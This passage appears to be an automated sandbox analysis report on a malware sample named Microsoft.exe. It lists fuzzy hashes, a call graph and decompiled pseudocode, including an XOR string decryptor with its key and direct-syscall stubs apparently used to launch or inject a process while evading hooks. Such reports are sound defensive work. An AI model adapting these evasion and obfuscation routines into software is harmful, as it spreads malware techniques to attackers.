                                                                                                                                    • Opcode Fuzzy Hash: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction Fuzzy Hash: 4211D376404280CFDB11CF10D5C4F56BF72FB84324F28C6AAD9450B656C37AD55ACBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 053BD3D3, Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.921494816.00000000053BD000.00000040.00000001.sdmp, Offset: 053BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_53bd000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction ID: 341397cf97ff398e48025c61c775153f59255c73df5afc22db3fe059d02b36ac
                                                                                                                                    • Opcode Fuzzy Hash: 14f94134bb014abb579cfd279659e17573a78b517b5aeb89abd8cbe1213a7701
                                                                                                                                    • Instruction Fuzzy Hash: A811D376404280DFDB11CF10D6C4B56BF72FB84324F28C6A9D9090F656C37AE46ACBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 097F8218, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 097F8276
                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 097F82B0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                    • String ID: TF]
                                                                                                                                    • API String ID: 4116985748-1744121126
                                                                                                                                    • Opcode ID: a318c1d99b0b5acc6e5d9adfc1f706f7c593bb8c039572494d7c9ca57fb1567c
                                                                                                                                    • Instruction ID: 1d98c2db2c2a2293200111c8ffffcc93ec818702d474e8b734c377534600cb83
                                                                                                                                    • Opcode Fuzzy Hash: a318c1d99b0b5acc6e5d9adfc1f706f7c593bb8c039572494d7c9ca57fb1567c
                                                                                                                                    • Instruction Fuzzy Hash: 3C2157B19047888FDB10CF99D4897DEBFF4AB08314F14805AD559BB350C7786548CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: Microsoft.exe PID: 7116 Parent PID: 5180 Microsoft.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:28%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:15
                                                                                                                                    Total number of Limit Nodes:0

                                                                                                                                    Graph

                                                                                                                                    execution_graph 303 4023f2 _controlfp 304 4010c4 2 API calls 303->304 305 402473 304->305 289 4022fa 290 40232c 289->290 293 40224f 290->293 292 4023e5 294 402285 293->294 297 4010c4 294->297 296 4022be 296->292 298 402480 297->298 299 4010e7 memset 298->299 300 40115b 299->300 301 401214 sprintf 300->301 302 4012bd 301->302 302->296

                                                                                                                                    Callgraph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    • Opacity -> Relevance
                                                                                                                                    • Disassembly available
                                                                                                                                    callgraph 0 Function_00401443 1 Function_00623A61 2 Function_004010C4 25 Function_004019D8 2->25 27 Function_00401D58 2->27 47 Function_00401000 2->47 60 Function_00401D98 2->60 61 Function_00401C98 2->61 68 Function_00401D18 2->68 3 Function_00623AE6 4 Function_00623667 5 Function_004017C6 6 Function_004024C7 7 Function_004022CB 8 Function_00623AEF 9 Function_00623BEC 10 Function_0040224F 10->2 15 Function_00402158 10->15 34 Function_004021EC 10->34 11 Function_00623AF3 12 Function_00401ED8 36 Function_004018EF 12->36 13 Function_00401DD8 13->36 14 Function_004020D8 14->36 16 Function_00402058 16->36 17 Function_00401FD8 17->36 18 Function_00401F58 18->36 19 Function_00401E58 19->36 20 Function_00401CD8 20->36 21 Function_00401C58 21->36 22 Function_00401BD8 22->36 23 Function_00401AD8 23->36 24 Function_00401B58 24->36 25->36 26 Function_00401A58 26->36 27->36 28 Function_006238FB 29 Function_00623BFF 30 Function_006238C0 31 Function_004021E5 32 Function_006238C5 33 Function_00623649 35 Function_00623D4C 80 Function_004014B4 36->80 37 Function_00401970 38 Function_004023F2 38->2 39 Function_006238D4 40 Function_00402477 41 Function_004022FA 41->10 42 Function_00623358 43 Function_00623D58 44 Function_00623AD8 45 Function_00623459 46 Function_006238DC 48 Function_00623923 49 Function_00401784 50 Function_00402487 51 Function_006238AC 52 Function_00623E36 53 Function_006230B6 54 Function_00623AB7 55 Function_00402497 56 Function_00401E18 56->36 57 Function_00401F98 57->36 58 Function_00401E98 58->36 59 Function_00401F18 59->36 60->36 61->36 62 Function_00401C18 62->36 63 Function_00401B98 63->36 64 Function_00401A98 64->36 65 Function_00401B18 65->36 66 Function_00401998 66->36 67 Function_00401A18 67->36 68->36 69 Function_00402098 69->36 70 Function_00402118 70->36 71 Function_00402018 71->36 72 Function_006232BC 73 Function_00623B03 74 Function_00623C03 75 Function_00623B00 76 Function_004024A7 77 Function_0062348F 78 Function_00623A8D 79 Function_00623291 80->0 80->37 81 Function_004024B7 82 Function_00623C98 83 Function_004010BD

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004010C4, Relevance: 2.7, APIs: 2, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                    			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				intOrPtr _v24;
				char _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v696;
				void* _v1216;
				long long _v1224;
				long long _v1232;
				long long _v1256;
				long long _v1264;
				long long _v1272;
				long long _v1280;
				long long _v1288;
				long long _v1296;
				long long _v1304;
				long long _t105;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402480(); // executed
				memset(??, ??, ??);
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x21f6d4;
				_v160 = 0;
				L00402490();
				E00401000(0x403021,  &_v176);
				_v1224 = 0x403021;
				E00401000(0x403027, 0x403021);
				L00402498();
				_v1232 = 0x403021;
				E00401000(0x403032, 0x403021);
				L004024A0();
				E00401000(0x403047,  &_v696);
				sprintf(??, ??);
				_v1264 =  &_v32;
				_v1272 =  &_v136;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = 0;
				_v1304 = 0;
				_t105 =  &_v696;
				L004024A8(); // executed
				_v1296 = _t105;
				_v1304 = _t105;
				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
				E00401000(0x403051, _v32); // executed
				_v1304 =  &_v160;
				E00401D18(_v32, _v144, 0x403051, _v152); // executed
				_v1304 = 0;
				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
				_v1256 = 0;
				_v1264 = 0;
				_v1272 = 0;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = _v144;
				_v1304 = _v144;
				E004019D8( &_v168, 0, 0, _v32); // executed
				E00401C98(_v32, 0, 0, _v32); // executed
				E00401C98(_v24, 0, 0, _v32);
				return 0;
			}























                                                                                                                                    0x004010cf
                                                                                                                                    0x004010d3
                                                                                                                                    0x004010e2
                                                                                                                                    0x00401109
                                                                                                                                    0x00401113
                                                                                                                                    0x00401120
                                                                                                                                    0x00401131
                                                                                                                                    0x00401142
                                                                                                                                    0x00401156
                                                                                                                                    0x00401173
                                                                                                                                    0x0040118a
                                                                                                                                    0x00401197
                                                                                                                                    0x004011a2
                                                                                                                                    0x004011b9
                                                                                                                                    0x004011c6
                                                                                                                                    0x004011f2
                                                                                                                                    0x0040120f
                                                                                                                                    0x0040123b
                                                                                                                                    0x00401244
                                                                                                                                    0x0040124d
                                                                                                                                    0x0040125c
                                                                                                                                    0x0040126b
                                                                                                                                    0x00401275
                                                                                                                                    0x0040127f
                                                                                                                                    0x004012a8
                                                                                                                                    0x004012b8
                                                                                                                                    0x004012c2
                                                                                                                                    0x004012cc
                                                                                                                                    0x004012fa
                                                                                                                                    0x00401318
                                                                                                                                    0x00401324
                                                                                                                                    0x0040134d
                                                                                                                                    0x0040135c
                                                                                                                                    0x0040138a
                                                                                                                                    0x00401399
                                                                                                                                    0x004013a8
                                                                                                                                    0x004013b7
                                                                                                                                    0x004013c6
                                                                                                                                    0x004013d0
                                                                                                                                    0x004013dc
                                                                                                                                    0x004013e8
                                                                                                                                    0x00401419
                                                                                                                                    0x00401428
                                                                                                                                    0x00401437
                                                                                                                                    0x00401442

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memsetsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4041149307-0
                                                                                                                                    • Opcode ID: d02ffffd526ca4d1d40271a7e1be89ee7844afb3341acfed29f58bf30157dfb6
                                                                                                                                    • Instruction ID: 28daaeaef00d616998e339d9eba2e089cf35f341dc889e84609328ce122c0ee3
                                                                                                                                    • Opcode Fuzzy Hash: d02ffffd526ca4d1d40271a7e1be89ee7844afb3341acfed29f58bf30157dfb6
                                                                                                                                    • Instruction Fuzzy Hash: B5712B61702B548DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401000, Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
				long long _v16;
				signed int _v20;
				void* _v32;
				signed char* _v40;
				signed int _t30;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402478(); // executed
				_v16 = _a16 + 1;
				 *((char*)(_v16 + _a16)) = 0;
				_v20 = 0;
				while(1) {
					_t30 = _v20;
					if(_t30 >= _a16) {
						break;
					}
					_v32 = _v16 + _v20;
					_v40 = _a8 + _v20;
					asm("cdq");
					 *_v32 =  *_v40 ^  *(")[gulj=1,gne@z<p[i777>/^94)w@]i<" + _v20 % 0x20);
					_v20 = _v20 + 1;
				}
				return _t30;
			}








                                                                                                                                    0x0040100b
                                                                                                                                    0x0040100f
                                                                                                                                    0x00401023
                                                                                                                                    0x00401028
                                                                                                                                    0x0040103e
                                                                                                                                    0x00401045
                                                                                                                                    0x00401048
                                                                                                                                    0x00401048
                                                                                                                                    0x00401050
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401085
                                                                                                                                    0x0040108e
                                                                                                                                    0x00401092
                                                                                                                                    0x004010b2
                                                                                                                                    0x00401063
                                                                                                                                    0x00401063
                                                                                                                                    0x004010bb

                                                                                                                                    Strings
                                                                                                                                    • )[gulj=1,gne@z<p[i777>/^94)w@]i<, xrefs: 00401098
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )[gulj=1,gne@z<p[i777>/^94)w@]i<
                                                                                                                                    • API String ID: 0-3874697493
                                                                                                                                    • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                    • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                                                                                    • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                    • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004022FA, Relevance: .1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

				L00402488();
				L004024B8();
				L004024C0();
				L004024C8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L004024D0();
				_v24 = __imp____argc;
				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L004024D8(); // executed
				return _t15;
			}








                                                                                                                                    0x00402327
                                                                                                                                    0x00402339
                                                                                                                                    0x00402349
                                                                                                                                    0x00402364
                                                                                                                                    0x0040237e
                                                                                                                                    0x00402386
                                                                                                                                    0x004023a7
                                                                                                                                    0x004023c1
                                                                                                                                    0x004023e0
                                                                                                                                    0x004023eb
                                                                                                                                    0x004023f1

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 58cfcd5e2d77a1078c5958fa12d752153226018f104331c9e298af2d9dfcd4de
                                                                                                                                    • Instruction ID: fdcd294e7d346e20429f8390d4d46d0307c8d648db4f96dad9cbda4ae6971f7d
                                                                                                                                    • Opcode Fuzzy Hash: 58cfcd5e2d77a1078c5958fa12d752153226018f104331c9e298af2d9dfcd4de
                                                                                                                                    • Instruction Fuzzy Hash: E4213A64301E149CEB44DB67DD6539933A5B74DFC8F808836AE0CAB3A5EEBDCA108354
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040224F, Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00402158(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E004021EC();
				return _v12;
			}






                                                                                                                                    0x0040225a
                                                                                                                                    0x0040225e
                                                                                                                                    0x00402262
                                                                                                                                    0x00402280
                                                                                                                                    0x0040229a
                                                                                                                                    0x004022b9
                                                                                                                                    0x004022be
                                                                                                                                    0x004022c1
                                                                                                                                    0x004022ca

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memsetsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4041149307-0
                                                                                                                                    • Opcode ID: cd29811eee24fb94dc871b881a1af37a21bf8c2081a2d9639fde778e18c701ea
                                                                                                                                    • Instruction ID: 6dddc1fb8b6602e07d372d103a862450ec8bef39f86e7497fa16a68067e844f9
                                                                                                                                    • Opcode Fuzzy Hash: cd29811eee24fb94dc871b881a1af37a21bf8c2081a2d9639fde778e18c701ea
                                                                                                                                    • Instruction Fuzzy Hash: 4D01A476701B598DDB40DF66DC9139837A4F309BC8F008826AE5CA7B69DA79C6218744
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 004019D8, Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                    			E004019D8(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                                                                                                    0x004019d8
                                                                                                                                    0x004019dd
                                                                                                                                    0x004019e2
                                                                                                                                    0x004019e7
                                                                                                                                    0x004019f5
                                                                                                                                    0x00401a15
                                                                                                                                    0x00401a17

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                                                                                    • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                                                                                                    • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                                                                                    • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D58, Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                    			E00401D58(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                                                                                                    0x00401d58
                                                                                                                                    0x00401d5d
                                                                                                                                    0x00401d62
                                                                                                                                    0x00401d67
                                                                                                                                    0x00401d75
                                                                                                                                    0x00401d95
                                                                                                                                    0x00401d97

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                                                                                    • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                                                                                                    • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                                                                                    • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401C98, Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                    			E00401C98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                                                                                                    0x00401c98
                                                                                                                                    0x00401c9d
                                                                                                                                    0x00401ca2
                                                                                                                                    0x00401ca7
                                                                                                                                    0x00401cb5
                                                                                                                                    0x00401cd5
                                                                                                                                    0x00401cd7

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                                                                                    • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                                                                                                    • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                                                                                    • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D98, Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                    			E00401D98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                                                                                                    0x00401d98
                                                                                                                                    0x00401d9d
                                                                                                                                    0x00401da2
                                                                                                                                    0x00401da7
                                                                                                                                    0x00401db5
                                                                                                                                    0x00401dd5
                                                                                                                                    0x00401dd7

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                                                                                    • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                                                                                                    • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                                                                                    • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D18, Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                    			E00401D18(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                                                                                                    0x00401d18
                                                                                                                                    0x00401d1d
                                                                                                                                    0x00401d22
                                                                                                                                    0x00401d27
                                                                                                                                    0x00401d35
                                                                                                                                    0x00401d55
                                                                                                                                    0x00401d57

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.737694099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.737677539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.737725563.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 0000000A.00000002.739257457.0000000000623000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_Microsoft.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                                                                                    • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                                                                                                    • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                                                                                    • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: conhost.exe PID: 2188 Parent PID: 7116 conhost.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:11.6%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:21
                                                                                                                                    Total number of Limit Nodes:2

                                                                                                                                    Graph

